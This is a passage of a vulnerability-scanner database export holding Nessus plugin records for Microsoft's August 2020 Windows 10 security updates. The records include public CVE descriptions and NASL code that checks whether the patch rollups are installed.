(CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. 
An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. 
The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539,\n CVE-2020-1540, CVE-2020-1541, CVE-2020-1542,\n CVE-2020-1543, CVE-2020-1544, CVE-2020-1545,\n CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. 
(CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way the\n Windows State Repository Service handles objects in\n memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. 
The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571709/windows-10-update-kb4571709\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3c857b4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4571709.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : 
Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571709'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571709])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:32", "description": "The remote Windows host is missing security update 4566782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user 
rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists on ARM implementations that use speculative execution in control flow via a side-channel analysis, aka "straight-line speculation." (CVE-2020-1459)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. 
The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. 
(CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. 
An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1569)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
(CVE-2020-1510)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Engine improperly handles memory.\n (CVE-2020-1535, CVE-2020-1536, CVE-2020-1539, CVE-2020-1540, CVE-2020-1541, CVE-2020-1542, CVE-2020-1543, CVE-2020-1544, CVE-2020-1545, CVE-2020-1546, CVE-2020-1547, CVE-2020-1551)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. 
(CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4566782: Windows 10 Version 2004 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1417", "CVE-2020-1459", "CVE-2020-1464", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1479", "CVE-2020-1480", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1510", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1524", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1528", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1535", "CVE-2020-1536", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1539", "CVE-2020-1540", "CVE-2020-1541", "CVE-2020-1542", 
"CVE-2020-1543", "CVE-2020-1544", "CVE-2020-1545", "CVE-2020-1546", "CVE-2020-1547", "CVE-2020-1548", "CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1551", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1555", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1569", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1578", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4566782.NASL", "href": "https://www.tenable.com/plugins/nessus/139486", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139486);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/06\");\n\n script_cve_id(\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1417\",\n \"CVE-2020-1459\",\n \"CVE-2020-1464\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1479\",\n \"CVE-2020-1480\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1510\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n 
\"CVE-2020-1522\",\n \"CVE-2020-1524\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1528\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1535\",\n \"CVE-2020-1536\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1539\",\n \"CVE-2020-1540\",\n \"CVE-2020-1541\",\n \"CVE-2020-1542\",\n \"CVE-2020-1543\",\n \"CVE-2020-1544\",\n \"CVE-2020-1545\",\n \"CVE-2020-1546\",\n \"CVE-2020-1547\",\n \"CVE-2020-1548\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1551\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1555\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1569\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1578\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"MSKB\", value:\"4566782\");\n script_xref(name:\"MSFT\", value:\"MS20-4566782\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"KB4566782: Windows 10 Version 2004 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4566782.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n 
Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. 
(CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists on ARM\n implementations that use speculative execution in\n control flow via a side-channel analysis, aka\n "straight-line speculation." (CVE-2020-1459)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge (HTML-based). The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. 
(CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - An elevation of privilege 